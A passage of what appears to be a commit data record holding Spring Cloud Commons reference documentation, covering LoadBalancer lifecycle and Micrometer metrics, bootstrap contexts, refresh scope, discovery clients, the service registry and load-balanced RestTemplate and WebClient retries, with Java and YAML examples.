LoadBalancer configuration>> is `LoadBalancerLifecycle`.\n\nThe `LoadBalancerLifecycle` beans provide callback methods, named `onStart(Request<RC> request)`, `onStartRequest(Request<RC> request, Response<T> lbResponse)` and `onComplete(CompletionContext<RES, T, RC> completionContext)`, that you should implement to specify what actions should take place before and after load-balancing.\n\n`onStart(Request<RC> request)` takes a `Request` object as a parameter. It contains data that is used to select an appropriate instance, including the downstream client request and <<spring-cloud-loadbalancer-hints,hint>>. `onStartRequest` also takes the `Request` object and, additionally, the `Response<T>` object as parameters. On the other hand, a `CompletionContext` object is provided to the `onComplete(CompletionContext<RES, T, RC> completionContext)` method. It contains the LoadBalancer `Response`, including the selected service instance, the `Status` of the request executed against that service instance and (if available) the response returned to the downstream client, and (if an exception has occurred) the corresponding `Throwable`.\n\nThe `supports(Class requestContextClass, Class responseClass,\nClass serverTypeClass)` method can be used to determine whether the processor in question handles objects of provided types. If not overridden by the user, it returns `true`.\n\nNOTE: In the preceding method calls, `RC` means `RequestContext` type, `RES` means client response type, and `T` means returned server type.\n\n[[loadbalancer-micrometer-stats-lifecycle]]\n=== Spring Cloud LoadBalancer Statistics\n\nWe provide a `LoadBalancerLifecycle` bean called `MicrometerStatsLoadBalancerLifecycle`, which uses Micrometer to provide statistics for load-balanced calls.\n\nIn order to get this bean added to your application context,\nset the value of the `spring.cloud.loadbalancer.stats.micrometer.enabled` to `true` and have a `MeterRegistry` available (for example, by adding https:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/html\/production-ready-features.html[Spring Boot Actuator] to your project).\n\n`MicrometerStatsLoadBalancerLifecycle` registers the following meters in `MeterRegistry`:\n\n* `loadbalancer.requests.active`: A gauge that allows you to monitor the number of currently active requests for any service instance (service instance data available via tags);\n* `loadbalancer.requests.success`: A timer that measures the time of execution of any load-balanced requests that have ended in passing a response on to the underlying client;\n* `loadbalancer.requests.failed`: A timer that measures the time of execution of any load-balanced requests that have ended with an exception;\n* `loadbalancer.requests.discard`: A counter that measures the number of discarded load-balanced requests, i.e. requests where a service instance to run the request on has not been retrieved by the LoadBalancer.\n\nAdditional information regarding the service instances, request data, and response data is added to metrics via tags whenever available.\n\nNOTE: For some implementations, such as `BlockingLoadBalancerClient`, request and response data might not be available, as we establish generic types from arguments and might not be able to determine the types and read the data.\n\nNOTE: The meters are registered in the registry when at least one record is added for a given meter.\n\nTIP: You can further configure the behavior of those metrics (for example, add https:\/\/micrometer.io\/docs\/concepts#_histograms_and_percentiles[publishing percentiles and histograms]) by https:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/html\/production-ready-features.html#production-ready-metrics-per-meter-properties[adding `MeterFilters`].\n\n== Spring Cloud Circuit Breaker\n\ninclude::spring-cloud-circuitbreaker.adoc[leveloffset=+1]\n\n== CachedRandomPropertySource\n\nSpring Cloud Context provides a `PropertySource` that caches random values based on a key. Outside of the caching\nfunctionality it works the same as Spring Boot's https:\/\/github.com\/spring-projects\/spring-boot\/blob\/main\/spring-boot-project\/spring-boot\/src\/main\/java\/org\/springframework\/boot\/env\/RandomValuePropertySource.java[`RandomValuePropertySource`].\nThis random value might be useful in the case where you want a random value that is consistent even after the Spring Application\ncontext restarts. The property value takes the form of `cachedrandom.[yourkey].[type]` where `yourkey` is the key in the cache. The `type` value can\nbe any type supported by Spring Boot's `RandomValuePropertySource`.\n\n====\n[source,properties,indent=0]\n----\nmyrandom=${cachedrandom.appname.value}\n----\n====\n\n[[spring-cloud-security]]\n== Security\n\n[[spring-cloud-security-single-sign-on]]\n=== Single Sign On\n\nNOTE: All of the OAuth2 SSO and resource server features moved to Spring Boot\nin version 1.3. You can find documentation in the\nhttps:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/htmlsingle\/[Spring Boot user guide].\n\n[[spring-cloud-security-client-token-relay]]\n==== Client Token Relay\n\nIf your app is a user facing OAuth2 client (i.e. has declared\n`@EnableOAuth2Sso` or `@EnableOAuth2Client`) then it has an\n`OAuth2ClientContext` in request scope from Spring Boot. You can\ncreate your own `OAuth2RestTemplate` from this context and an\nautowired `OAuth2ProtectedResourceDetails`, and then the context will\nalways forward the access token downstream, also refreshing the access\ntoken automatically if it expires. (These are features of Spring\nSecurity and Spring Boot.)\n\n[[spring-cloud-security-resource-server-token-relay]]\n==== Resource Server Token Relay\n\nIf your app has `@EnableResourceServer` you might want to relay the\nincoming token downstream to other services. If you use a\n`RestTemplate` to contact the downstream services then this is just a\nmatter of how to create the template with the right context.\n\nIf your service uses `UserInfoTokenServices` to authenticate incoming\ntokens (i.e. it is using the `security.oauth2.user-info-uri`\nconfiguration), then you can simply create an `OAuth2RestTemplate`\nusing an autowired `OAuth2ClientContext` (it will be populated by the\nauthentication process before it hits the backend code). Equivalently\n(with Spring Boot 1.4), you could inject a\n`UserInfoRestTemplateFactory` and grab its `OAuth2RestTemplate` in\nyour configuration. For example:\n\n.MyConfiguration.java\n[source,java]\n----\n@Bean\npublic OAuth2RestTemplate restTemplate(UserInfoRestTemplateFactory factory) {\n return factory.getUserInfoRestTemplate();\n}\n----\n\nThis rest template will then have the same `OAuth2ClientContext`\n(request-scoped) that is used by the authentication filter, so you can\nuse it to send requests with the same access token.\n\nIf your app is not using `UserInfoTokenServices` but is still a client\n(i.e. it declares `@EnableOAuth2Client` or `@EnableOAuth2Sso`), then\nwith Spring Security Cloud any `OAuth2RestOperations` that the user\ncreates from an `@Autowired` `OAuth2Context` will also forward\ntokens. This feature is implemented by default as an MVC handler\ninterceptor, so it only works in Spring MVC. If you are not using MVC\nyou could use a custom filter or AOP interceptor wrapping an\n`AccessTokenContextRelay` to provide the same feature.\n\nHere's a basic\nexample showing the use of an autowired rest template created\nelsewhere (\"foo.com\" is a Resource Server accepting the same tokens as\nthe surrounding app):\n\n.MyController.java\n[source,java]\n----\n@Autowired\nprivate OAuth2RestOperations restTemplate;\n\n@RequestMapping(\"\/relay\")\npublic String relay() {\n ResponseEntity<String> response =\n restTemplate.getForEntity(\"https:\/\/foo.com\/bar\", String.class);\n return \"Success! (\" + response.getBody() + \")\";\n}\n----\n\nIf you don't want to forward tokens (and that is a valid\nchoice, since you might want to act as yourself, rather than the\nclient that sent you the token), then you only need to create your own\n`OAuth2Context` instead of autowiring the default one.\n\nFeign clients will also pick up an interceptor that uses the\n`OAuth2ClientContext` if it is available, so they should also do a\ntoken relay anywhere where a `RestTemplate` would.\n\n== Configuration Properties\n\nTo see the list of all Spring Cloud Commons related configuration properties please check link:appendix.html[the Appendix page].\n","old_contents":"= Cloud Native Applications\ninclude::_attributes.adoc[]\n\ninclude::intro.adoc[]\n\n\/\/ TODO: figure out remote includes in docs and replace pasted text\n\/\/ include::https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/master\/docs\/src\/main\/asciidoc\/contributing-docs.adoc[]\nNOTE: Spring Cloud is released under the non-restrictive Apache 2.0 license.\nIf you would like to contribute to this section of the documentation or if you find an error, you can find the source code and issue trackers for the project at {docslink}[github].\n\n== Spring Cloud Context: Application Context Services\n\nSpring Boot has an opinionated view of how to build an application with Spring.\nFor instance, it has conventional locations for common configuration files and has endpoints for common management and monitoring tasks.\nSpring Cloud builds on top of that and adds a few features that many components in a system would use or occasionally need.\n\n=== The Bootstrap Application Context\n\nA Spring Cloud application operates by creating a \"`bootstrap`\" context, which is a parent context for the main application.\nThis context is responsible for loading configuration properties from the external sources and for decrypting properties in the local external configuration files.\nThe two contexts share an `Environment`, which is the source of external properties for any Spring application.\nBy default, bootstrap properties (not `bootstrap.properties` but properties that are loaded during the bootstrap phase) are added with high precedence, so they cannot be overridden by local configuration.\n\nThe bootstrap context uses a different convention for locating external configuration than the main application context.\nInstead of `application.yml` (or `.properties`), you can use `bootstrap.yml`, keeping the external configuration for bootstrap and main context nicely separate.\nThe following listing shows an example:\n\n.bootstrap.yml\n====\n----\nspring:\n application:\n name: foo\n cloud:\n config:\n uri: ${SPRING_CONFIG_URI:http:\/\/localhost:8888}\n----\n====\n\nIf your application needs any application-specific configuration from the server, it is a good idea to set the `spring.application.name` (in `bootstrap.yml` or `application.yml`).\nFor the property `spring.application.name` to be used as the application's context ID, you must set it in `bootstrap.[properties | yml]`.\n\nIf you want to retrieve specific profile configuration, you should also set `spring.profiles.active` in `bootstrap.[properties | yml]`.\n\nYou can disable the bootstrap process completely by setting `spring.cloud.bootstrap.enabled=false` (for example, in system properties).\n\n=== Application Context Hierarchies\n\nIf you build an application context from `SpringApplication` or `SpringApplicationBuilder`, the Bootstrap context is added as a parent to that context.\nIt is a feature of Spring that child contexts inherit property sources and profiles from their parent, so the \"`main`\" application context contains additional property sources, compared to building the same context without Spring Cloud Config.\nThe additional property sources are:\n\n* \"`bootstrap`\": If any `PropertySourceLocators` are found in the bootstrap context and if they have non-empty properties, an optional `CompositePropertySource` appears with high priority.\nAn example would be properties from the Spring Cloud Config Server.\nSee \"`<<customizing-bootstrap-property-sources>>`\" for how to customize the contents of this property source.\n\n* \"`applicationConfig: [classpath:bootstrap.yml]`\" (and related files if Spring profiles are active): If you have a `bootstrap.yml` (or `.properties`), those properties are used to configure the bootstrap context.\nThen they get added to the child context when its parent is set.\nThey have lower precedence than the `application.yml` (or `.properties`) and any other property sources that are added to the child as a normal part of the process of creating a Spring Boot application.\nSee \"`<<customizing-bootstrap-properties>>`\" for how to customize the contents of these property sources.\n\nBecause of the ordering rules of property sources, the \"`bootstrap`\" entries take precedence.\nHowever, note that these do not contain any data from `bootstrap.yml`, which has very low precedence but can be used to set defaults.\n\nYou can extend the context hierarchy by setting the parent context of any `ApplicationContext` you create -- for example, by using its own interface or with the `SpringApplicationBuilder` convenience methods (`parent()`, `child()` and `sibling()`).\nThe bootstrap context is the parent of the most senior ancestor that you create yourself.\nEvery context in the hierarchy has its own \"`bootstrap`\" (possibly empty) property source to avoid promoting values inadvertently from parents down to their descendants.\nIf there is a config server, every context in the hierarchy can also (in principle) have a different `spring.application.name` and, hence, a different remote property source.\nNormal Spring application context behavior rules apply to property resolution: properties from a child context override those in\nthe parent, by name and also by property source name.\n(If the child has a property source with the same name as the parent, the value from the parent is not included in the child).\n\nNote that the `SpringApplicationBuilder` lets you share an `Environment` amongst the whole hierarchy, but that is not the default.\nThus, sibling contexts (in particular) do not need to have the same profiles or property sources, even though they may share common values with their parent.\n\n[[customizing-bootstrap-properties]]\n=== Changing the Location of Bootstrap Properties\n\nThe `bootstrap.yml` (or `.properties`) location can be specified by setting `spring.cloud.bootstrap.name` (default: `bootstrap`), `spring.cloud.bootstrap.location` (default: empty) or `spring.cloud.bootstrap.additional-location` (default: empty) -- for example, in System properties.\n\nThose properties behave like the `spring.config.*` variants with the same name.\nWith `spring.cloud.bootstrap.location` the default locations are replaced and only the specified ones are used.\nTo add locations to the list of default ones, `spring.cloud.bootstrap.additional-location` could be used.\nIn fact, they are used to set up the bootstrap `ApplicationContext` by setting those properties in its `Environment`.\nIf there is an active profile (from `spring.profiles.active` or through the `Environment` API in the context you are building), properties in that profile get loaded as well, the same as in a regular Spring Boot app -- for example, from `bootstrap-development.properties` for a `development` profile.\n\n[[overriding-bootstrap-properties]]\n=== Overriding the Values of Remote Properties\n\nThe property sources that are added to your application by the bootstrap context are often \"`remote`\" (from example, from Spring Cloud Config Server).\nBy default, they cannot be overridden locally.\nIf you want to let your applications override the remote properties with their own system properties or config files, the remote property source has to grant it permission by setting `spring.cloud.config.allowOverride=true` (it does not work to set this locally).\nOnce that flag is set, two finer-grained settings control the location of the remote properties in relation to system properties and the application's local configuration:\n\n* `spring.cloud.config.overrideNone=true`: Override from any local property source.\n* `spring.cloud.config.overrideSystemProperties=false`: Only system properties, command line arguments, and environment variables (but not the local config files) should override the remote settings.\n\n=== Customizing the Bootstrap Configuration\n\nThe bootstrap context can be set to do anything you like by adding entries to `\/META-INF\/spring.factories` under a key named `org.springframework.cloud.bootstrap.BootstrapConfiguration`.\nThis holds a comma-separated list of Spring `@Configuration` classes that are used to create the context.\nAny beans that you want to be available to the main application context for autowiring can be created here.\nThere is a special contract for `@Beans` of type `ApplicationContextInitializer`.\nIf you want to control the startup sequence, you can mark classes with the `@Order` annotation (the default order is `last`).\n\nWARNING: When adding custom `BootstrapConfiguration`, be careful that the classes you add are not `@ComponentScanned` by mistake into your \"`main`\" application context, where they might not be needed.\nUse a separate package name for boot configuration classes and make sure that name is not already covered by your `@ComponentScan` or `@SpringBootApplication` annotated configuration classes.\n\nThe bootstrap process ends by injecting initializers into the main `SpringApplication` instance (which is the normal Spring Boot startup sequence, whether it runs as a standalone application or is deployed in an application server).\nFirst, a bootstrap context is created from the classes found in `spring.factories`.\nThen, all `@Beans` of type `ApplicationContextInitializer` are added to the main `SpringApplication` before it is started.\n\n[[customizing-bootstrap-property-sources]]\n=== Customizing the Bootstrap Property Sources\n\nThe default property source for external configuration added by the bootstrap process is the Spring Cloud Config Server, but you can add additional sources by adding beans of type `PropertySourceLocator` to the bootstrap context (through `spring.factories`).\nFor instance, you can insert additional properties from a different server or from a database.\n\nAs an example, consider the following custom locator:\n\n====\n[source,java]\n----\n@Configuration\npublic class CustomPropertySourceLocator implements PropertySourceLocator {\n\n @Override\n public PropertySource<?> locate(Environment environment) {\n return new MapPropertySource(\"customProperty\",\n Collections.<String, Object>singletonMap(\"property.from.sample.custom.source\", \"worked as intended\"));\n }\n\n}\n----\n====\n\nThe `Environment` that is passed in is the one for the `ApplicationContext` about to be created -- in other words, the one for which we supply additional property sources.\nIt already has its normal Spring Boot-provided property sources, so you can use those to locate a property source specific to this `Environment` (for example, by keying it on `spring.application.name`, as is done in the default Spring Cloud Config Server property source locator).\n\nIf you create a jar with this class in it and then add a `META-INF\/spring.factories` containing the following setting, the `customProperty` `PropertySource` appears in any application that includes that jar on its classpath:\n\n====\n[source]\n----\norg.springframework.cloud.bootstrap.BootstrapConfiguration=sample.custom.CustomPropertySourceLocator\n----\n====\n\n=== Logging Configuration\n\nIf you use Spring Boot to configure log settings, you should place this configuration in `bootstrap.[yml | properties]` if you would like it to apply to all events.\n\nNOTE: For Spring Cloud to initialize logging configuration properly, you cannot use a custom prefix.\nFor example, using `custom.loggin.logpath` is not recognized by Spring Cloud when initializing the logging system.\n\n=== Environment Changes\n\nThe application listens for an `EnvironmentChangeEvent` and reacts to the change in a couple of standard ways (additional `ApplicationListeners` can be added as `@Beans` in the normal way).\nWhen an `EnvironmentChangeEvent` is observed, it has a list of key values that have changed, and the application uses those to:\n\n* Re-bind any `@ConfigurationProperties` beans in the context.\n* Set the logger levels for any properties in `logging.level.*`.\n\nNote that the Spring Cloud Config Client does not, by default, poll for changes in the `Environment`.\nGenerally, we would not recommend that approach for detecting changes (although you could set it up with a\n`@Scheduled` annotation).\nIf you have a scaled-out client application, it is better to broadcast the `EnvironmentChangeEvent` to all the instances instead of having them polling for changes (for example, by using the https:\/\/github.com\/spring-cloud\/spring-cloud-bus[Spring Cloud Bus]).\n\nThe `EnvironmentChangeEvent` covers a large class of refresh use cases, as long as you can actually make a change to the `Environment` and publish the event.\nNote that those APIs are public and part of core Spring).\nYou can verify that the changes are bound to `@ConfigurationProperties` beans by visiting the `\/configprops` endpoint (a standard Spring Boot Actuator feature).\nFor instance, a `DataSource` can have its `maxPoolSize` changed at runtime (the default `DataSource` created by Spring Boot is a `@ConfigurationProperties` bean) and grow capacity dynamically.\nRe-binding `@ConfigurationProperties` does not cover another large class of use cases, where you need more control over the refresh and where you need a change to be atomic over the whole `ApplicationContext`.\nTo address those concerns, we have `@RefreshScope`.\n\n[[refresh-scope]]\n=== Refresh Scope\n\nWhen there is a configuration change, a Spring `@Bean` that is marked as `@RefreshScope` gets special treatment.\nThis feature addresses the problem of stateful beans that get their configuration injected only when they are initialized.\nFor instance, if a `DataSource` has open connections when the database URL is changed through the `Environment`, you probably want the holders of those connections to be able to complete what they are doing.\nThen, the next time something borrows a connection from the pool, it gets one with the new URL.\n\nSometimes, it might even be mandatory to apply the `@RefreshScope` annotation on some beans that can be only initialized once.\nIf a bean is \"`immutable`\", you have to either annotate the bean with `@RefreshScope` or specify the classname under the property key: `spring.cloud.refresh.extra-refreshable`.\n\nWARNING: If you hava a `DataSource` bean that is a `HikariDataSource`, it can not be\nrefreshed. It is the default value for `spring.cloud.refresh.never-refreshable`. Choose a\ndifferent `DataSource` implementation if you need it to be refreshed.\n\nRefresh scope beans are lazy proxies that initialize when they are used (that is, when a method is called), and the scope acts as a cache of initialized values.\nTo force a bean to re-initialize on the next method call, you must invalidate its cache entry.\n\nThe `RefreshScope` is a bean in the context and has a public `refreshAll()` method to refresh all beans in the scope by clearing the target cache.\nThe `\/refresh` endpoint exposes this functionality (over HTTP or JMX).\nTo refresh an individual bean by name, there is also a `refresh(String)` method.\n\nTo expose the `\/refresh` endpoint, you need to add following configuration to your application:\n\n====\n[source,yaml]\n----\nmanagement:\n endpoints:\n web:\n exposure:\n include: refresh\n----\n====\n\nNOTE: `@RefreshScope` works (technically) on a `@Configuration` class, but it might lead to surprising behavior.\nFor example, it does not mean that all the `@Beans` defined in that class are themselves in `@RefreshScope`.\nSpecifically, anything that depends on those beans cannot rely on them being updated when a refresh is initiated, unless it is itself in `@RefreshScope`.\nIn that case, it is rebuilt on a refresh and its dependencies are re-injected.\nAt that point, they are re-initialized from the refreshed `@Configuration`).\n\n=== Encryption and Decryption\n\nSpring Cloud has an `Environment` pre-processor for decrypting property values locally.\nIt follows the same rules as the Spring Cloud Config Server and has the same external configuration through `encrypt.\\*`.\nThus, you can use encrypted values in the form of `{cipher}*`, and, as long as there is a valid key, they are decrypted before the main application context gets the `Environment` settings.\nTo use the encryption features in an application, you need to include Spring Security RSA in your classpath (Maven co-ordinates: `org.springframework.security:spring-security-rsa`), and you also need the full strength JCE extensions in your JVM.\n\ninclude::jce.adoc[]\n\n=== Endpoints\n\nFor a Spring Boot Actuator application, some additional management endpoints are available. You can use:\n\n* `POST` to `\/actuator\/env` to update the `Environment` and rebind `@ConfigurationProperties` and log levels.\n To enabled this endpoint you must set `management.endpoint.env.post.enabled=true`.\n* `\/actuator\/refresh` to re-load the boot strap context and refresh the `@RefreshScope` beans.\n* `\/actuator\/restart` to close the `ApplicationContext` and restart it (disabled by default).\n* `\/actuator\/pause` and `\/actuator\/resume` for calling the `Lifecycle` methods (`stop()` and `start()` on the `ApplicationContext`).\n\nNOTE: If you disable the `\/actuator\/restart` endpoint then the `\/actuator\/pause` and `\/actuator\/resume` endpoints\nwill also be disabled since they are just a special case of `\/actuator\/restart`.\n\n== Spring Cloud Commons: Common Abstractions\n\nPatterns such as service discovery, load balancing, and circuit breakers lend themselves to a common abstraction layer that can be consumed by all Spring Cloud clients, independent of the implementation (for example, discovery with Eureka or Consul).\n\n[[discovery-client]]\n=== The `@EnableDiscoveryClient` Annotation\n\nSpring Cloud Commons provides the `@EnableDiscoveryClient` annotation.\nThis looks for implementations of the `DiscoveryClient` and `ReactiveDiscoveryClient` interfaces with `META-INF\/spring.factories`.\nImplementations of the discovery client add a configuration class to `spring.factories` under the `org.springframework.cloud.client.discovery.EnableDiscoveryClient` key.\nExamples of `DiscoveryClient` implementations include https:\/\/cloud.spring.io\/spring-cloud-netflix\/[Spring Cloud Netflix Eureka], https:\/\/cloud.spring.io\/spring-cloud-consul\/[Spring Cloud Consul Discovery], and https:\/\/cloud.spring.io\/spring-cloud-zookeeper\/[Spring Cloud Zookeeper Discovery].\n\nSpring Cloud will provide both the blocking and reactive service discovery clients by default.\nYou can disable the blocking and\/or reactive clients easily by setting `spring.cloud.discovery.blocking.enabled=false` or `spring.cloud.discovery.reactive.enabled=false`.\nTo completely disable service discovery you just need to set `spring.cloud.discovery.enabled=false`.\n\nBy default, implementations of `DiscoveryClient` auto-register the local Spring Boot server with the remote discovery server.\nThis behavior can be disabled by setting `autoRegister=false` in `@EnableDiscoveryClient`.\n\nNOTE: `@EnableDiscoveryClient` is no longer required.\nYou can put a `DiscoveryClient` implementation on the classpath to cause the Spring Boot application to register with the service discovery server.\n\n==== Health Indicators\n\nCommons auto-configures the following Spring Boot health indicators.\n\n===== DiscoveryClientHealthIndicator\nThis health indicator is based on the currently registered `DiscoveryClient` implementation.\n\n* To disable entirely, set `spring.cloud.discovery.client.health-indicator.enabled=false`.\n* To disable the description field, set `spring.cloud.discovery.client.health-indicator.include-description=false`.\nOtherwise, it can bubble up as the `description` of the rolled up `HealthIndicator`.\n* To disable service retrieval, set `spring.cloud.discovery.client.health-indicator.use-services-query=false`.\nBy default, the indicator invokes the client's `getServices` method. In deployments with many registered services it may too\ncostly to retrieve all services during every check. This will skip the service retrieval and instead use the client's `probe` method.\n\n===== DiscoveryCompositeHealthContributor\nThis composite health indicator is based on all registered `DiscoveryHealthIndicator` beans. To disable,\nset `spring.cloud.discovery.client.composite-indicator.enabled=false`.\n\n==== Ordering `DiscoveryClient` instances\n`DiscoveryClient` interface extends `Ordered`. This is useful when using multiple discovery\n clients, as it allows you to define the order of the returned discovery clients, similar to\nhow you can order the beans loaded by a Spring application. By default, the order of any `DiscoveryClient` is set to\n`0`. If you want to set a different order for your custom `DiscoveryClient` implementations, you just need to override\nthe `getOrder()` method so that it returns the value that is suitable for your setup. Apart from this, you can use\nproperties to set the order of the `DiscoveryClient`\nimplementations provided by Spring Cloud, among others `ConsulDiscoveryClient`, `EurekaDiscoveryClient` and\n`ZookeeperDiscoveryClient`. In order to do it, you just need to set the\n`spring.cloud.{clientIdentifier}.discovery.order` (or `eureka.client.order` for Eureka) property to the desired value.\n\n==== SimpleDiscoveryClient\n\nIf there is no Service-Registry-backed `DiscoveryClient` in the classpath, `SimpleDiscoveryClient`\ninstance, that uses properties to get information on service and instances, will be used.\n\nThe information about the available instances should be passed to via properties in the following format:\n`spring.cloud.discovery.client.simple.instances.service1[0].uri=http:\/\/s11:8080`, where\n`spring.cloud.discovery.client.simple.instances` is the common prefix, then `service1` stands\nfor the ID of the service in question, while `[0]` indicates the index number of the instance\n(as visible in the example, indexes start with `0`), and then the value of `uri` is\nthe actual URI under which the instance is available.\n\n=== ServiceRegistry\n\nCommons now provides a `ServiceRegistry` interface that provides methods such as `register(Registration)` and `deregister(Registration)`, which let you provide custom registered services.\n`Registration` is a marker interface.\n\nThe following example shows the `ServiceRegistry` in use:\n\n====\n[source,java,indent=0]\n----\n@Configuration\n@EnableDiscoveryClient(autoRegister=false)\npublic class MyConfiguration {\n private ServiceRegistry registry;\n\n public MyConfiguration(ServiceRegistry registry) {\n this.registry = registry;\n }\n\n \/\/ called through some external process, such as an event or a custom actuator endpoint\n public void register() {\n Registration registration = constructRegistration();\n this.registry.register(registration);\n }\n}\n----\n====\n\nEach `ServiceRegistry` implementation has its own `Registry` implementation.\n\n* `ZookeeperRegistration` used with `ZookeeperServiceRegistry`\n* `EurekaRegistration` used with `EurekaServiceRegistry`\n* `ConsulRegistration` used with `ConsulServiceRegistry`\n\nIf you are using the `ServiceRegistry` interface, you are going to need to pass the\ncorrect `Registry` implementation for the `ServiceRegistry` implementation you\nare using.\n\n\n==== ServiceRegistry Auto-Registration\n\nBy default, the `ServiceRegistry` implementation auto-registers the running service.\nTo disable that behavior, you can set:\n* `@EnableDiscoveryClient(autoRegister=false)` to permanently disable auto-registration.\n* `spring.cloud.service-registry.auto-registration.enabled=false` to disable the behavior through configuration.\n\n===== ServiceRegistry Auto-Registration Events\n\nThere are two events that will be fired when a service auto-registers. The first event, called\n`InstancePreRegisteredEvent`, is fired before the service is registered. The second\nevent, called `InstanceRegisteredEvent`, is fired after the service is registered. You can register an\n`ApplicationListener`(s) to listen to and react to these events.\n\nNOTE: These events will not be fired if the `spring.cloud.service-registry.auto-registration.enabled` property is set to `false`.\n\n==== Service Registry Actuator Endpoint\n\nSpring Cloud Commons provides a `\/service-registry` actuator endpoint.\nThis endpoint relies on a `Registration` bean in the Spring Application Context.\nCalling `\/service-registry` with GET returns the status of the `Registration`.\nUsing POST to the same endpoint with a JSON body changes the status of the current `Registration` to the new value.\nThe JSON body has to include the `status` field with the preferred value.\nPlease see the documentation of the `ServiceRegistry` implementation you use for the allowed values when updating the status and the values returned for the status.\nFor instance, Eureka's supported statuses are `UP`, `DOWN`, `OUT_OF_SERVICE`, and `UNKNOWN`.\n\n[[rest-template-loadbalancer-client]]\n=== Spring RestTemplate as a Load Balancer Client\n\nYou can configure a `RestTemplate` to use a Load-balancer client.\nTo create a load-balanced `RestTemplate`, create a `RestTemplate` `@Bean` and use the `@LoadBalanced` qualifier, as the following example shows:\n\n====\n[source,java,indent=0]\n----\n@Configuration\npublic class MyConfiguration {\n\n @LoadBalanced\n @Bean\n RestTemplate restTemplate() {\n return new RestTemplate();\n }\n}\n\npublic class MyClass {\n @Autowired\n private RestTemplate restTemplate;\n\n public String doOtherStuff() {\n String results = restTemplate.getForObject(\"http:\/\/stores\/stores\", String.class);\n return results;\n }\n}\n----\n====\n\nCAUTION: A `RestTemplate` bean is no longer created through auto-configuration.\nIndividual applications must create it.\n\nThe URI needs to use a virtual host name (that is, a service name, not a host name).\nThe BlockingLoadBalancerClient is used to create a full physical address.\n\nIMPORTANT: To use a load-balanced `RestTemplate`, you need to have a load-balancer implementation in your classpath.\nAdd <<spring-cloud-loadbalancer-starter, Spring Cloud LoadBalancer starter>> to your project in order to use it.\n\n[[webclinet-loadbalancer-client]]\n=== Spring WebClient as a Load Balancer Client\n\nYou can configure `WebClient` to automatically use a load-balancer client.\nTo create a load-balanced `WebClient`, create a `WebClient.Builder` `@Bean` and use the `@LoadBalanced` qualifier, as follows:\n\n====\n[source,java,indent=0]\n----\n@Configuration\npublic class MyConfiguration {\n\n\t@Bean\n\t@LoadBalanced\n\tpublic WebClient.Builder loadBalancedWebClientBuilder() {\n\t\treturn WebClient.builder();\n\t}\n}\n\npublic class MyClass {\n @Autowired\n private WebClient.Builder webClientBuilder;\n\n public Mono<String> doOtherStuff() {\n return webClientBuilder.build().get().uri(\"http:\/\/stores\/stores\")\n \t\t\t\t.retrieve().bodyToMono(String.class);\n }\n}\n----\n====\n\nThe URI needs to use a virtual host name (that is, a service name, not a host name).\nThe Spring Cloud LoadBalancer is used to create a full physical address.\n\nIMPORTANT: If you want to use a `@LoadBalanced WebClient.Builder`, you need to have a load balancer\nimplementation in the classpath. We recommend that you add the\n<<spring-cloud-loadbalancer-starter, Spring Cloud LoadBalancer starter>> to your project.\nThen, `ReactiveLoadBalancer` is used underneath.\n\n==== Retrying Failed Requests\n\nA load-balanced `RestTemplate` can be configured to retry failed requests.\nBy default, this logic is disabled.\nFor the non-reactive version (with `RestTemplate`), you can enable it by adding link:https:\/\/github.com\/spring-projects\/spring-retry[Spring Retry] to your application's classpath. For the reactive version (with `WebTestClient), you need to set `spring.cloud.loadbalancer.retry.enabled=true`.\n\nIf you would like to disable the retry logic with Spring Retry or Reactive Retry on the classpath, you can set `spring.cloud.loadbalancer.retry.enabled=false`.\n\nFor the non-reactive implementation, if you would like to implement a `BackOffPolicy` in your retries, you need to create a bean of type `LoadBalancedRetryFactory` and override the `createBackOffPolicy()` method.\n\nFor the reactive implementation, you just need to enable it by setting `spring.cloud.loadbalancer.retry.backoff.enabled` to `false`.\n\nYou can set:\n\n- `spring.cloud.loadbalancer.retry.maxRetriesOnSameServiceInstance` - indicates how many times a request should be retried on the same `ServiceInstance` (counted separately for every selected instance)\n- `spring.cloud.loadbalancer.retry.maxRetriesOnNextServiceInstance` - indicates how many times a request should be retried a newly selected `ServiceInstance`\n- `spring.cloud.loadbalancer.retry.retryableStatusCodes` - the status codes on which to always retry a failed request.\n\nFor the reactive implementation, you can additionally set:\n - `spring.cloud.loadbalancer.retry.backoff.minBackoff` - Sets the minimum backoff duration (by default, 5 milliseconds)\n - `spring.cloud.loadbalancer.retry.backoff.maxBackoff` - Sets the maximum backoff duration (by default, max long value of milliseconds)\n - `spring.cloud.loadbalancer.retry.backoff.jitter` - Sets the jitter used for calculationg the actual backoff duration for each call (by default, 0.5).\n\nFor the reactive implementation, you can also implement your own `LoadBalancerRetryPolicy` to have more detailed control over the load-balanced call retries.\n\nNOTE: For load-balanced retries, by default, we wrap the `ServiceInstanceListSupplier` bean with `RetryAwareServiceInstanceListSupplier` to select a different instance from the one previously chosen, if available. You can disable this behavior by setting the value of `spring.cloud.loadbalancer.retry.avoidPreviousInstance` to `false`.\n\n====\n[source,java,indent=0]\n----\n@Configuration\npublic class MyConfiguration {\n @Bean\n LoadBalancedRetryFactory retryFactory() {\n return new LoadBalancedRetryFactory() {\n @Override\n public BackOffPolicy createBackOffPolicy(String service) {\n \t\treturn new ExponentialBackOffPolicy();\n \t}\n };\n }\n}\n----\n====\n\nIf you want to add one or more `RetryListener` implementations to your retry functionality, you need to\ncreate a bean of type `LoadBalancedRetryListenerFactory` and return the `RetryListener` array\nyou would like to use for a given service, as the following example shows:\n\n====\n[source,java,indent=0]\n----\n@Configuration\npublic class MyConfiguration {\n @Bean\n LoadBalancedRetryListenerFactory retryListenerFactory() {\n return new LoadBalancedRetryListenerFactory() {\n @Override\n public RetryListener[] createRetryListeners(String service) {\n return new RetryListener[]{new RetryListener() {\n @Override\n public <T, E extends Throwable> boolean open(RetryContext context, RetryCallback<T, E> callback) {\n \/\/TODO Do you business...\n return true;\n }\n\n @Override\n public <T, E extends Throwable> void close(RetryContext context, RetryCallback<T, E> callback, Throwable throwable) {\n \/\/TODO Do you business...\n }\n\n @Override\n public <T, E extends Throwable> void onError(RetryContext context, RetryCallback<T, E> callback, Throwable throwable) {\n \/\/TODO Do you business...\n }\n }};\n }\n };\n }\n}\n----\n====\n\n=== Multiple `RestTemplate` Objects\n\nIf you want a `RestTemplate` that is not load-balanced, create a `RestTemplate` bean and inject it.\nTo access the load-balanced `RestTemplate`, use the `@LoadBalanced` qualifier when you create your `@Bean`, as the following example 